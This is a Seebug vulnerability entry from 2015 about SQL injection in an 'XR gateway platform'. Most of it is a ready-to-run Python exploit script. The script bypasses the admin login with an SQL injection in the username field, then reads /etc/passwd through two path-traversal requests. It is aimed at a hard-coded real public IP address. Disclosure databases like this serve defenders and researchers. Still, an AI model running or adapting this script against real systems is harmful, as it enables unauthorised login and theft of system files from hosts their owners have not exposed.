XR网关平台SQL注入

2015-08-28T00:00:00
ID SSV:89258
Type seebug
Reporter c26
Modified 2015-08-28T00:00:00

Description

在IP/msa/main.xp ,username处存在SQL注入(post)

                                        
                                            
                                                #!/usr/bin/env python
#coding=utf-8


import requests

def login():
        url = target + '/msa/main.xp'
        data = {'Fun':'msaAdminLogon',
                        'username': "admin' or'1'='1",
                        'password': '123456'
                        }
        req = requests.post(url = url, data = data)
        print req.text

def download():
        url = target + '/msa/../../../../../../../../etc/passwd'
        req = requests.get(url = url)
        print req.text

def download2():
        url = target + '/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=test.txt+downLoadFile=../etc/passwd'
        req = requests.get(url = url)
        print req.text

if __name__ == '__main__':
        target = 'http://112.16.141.6'

        login()

        download()

        download2()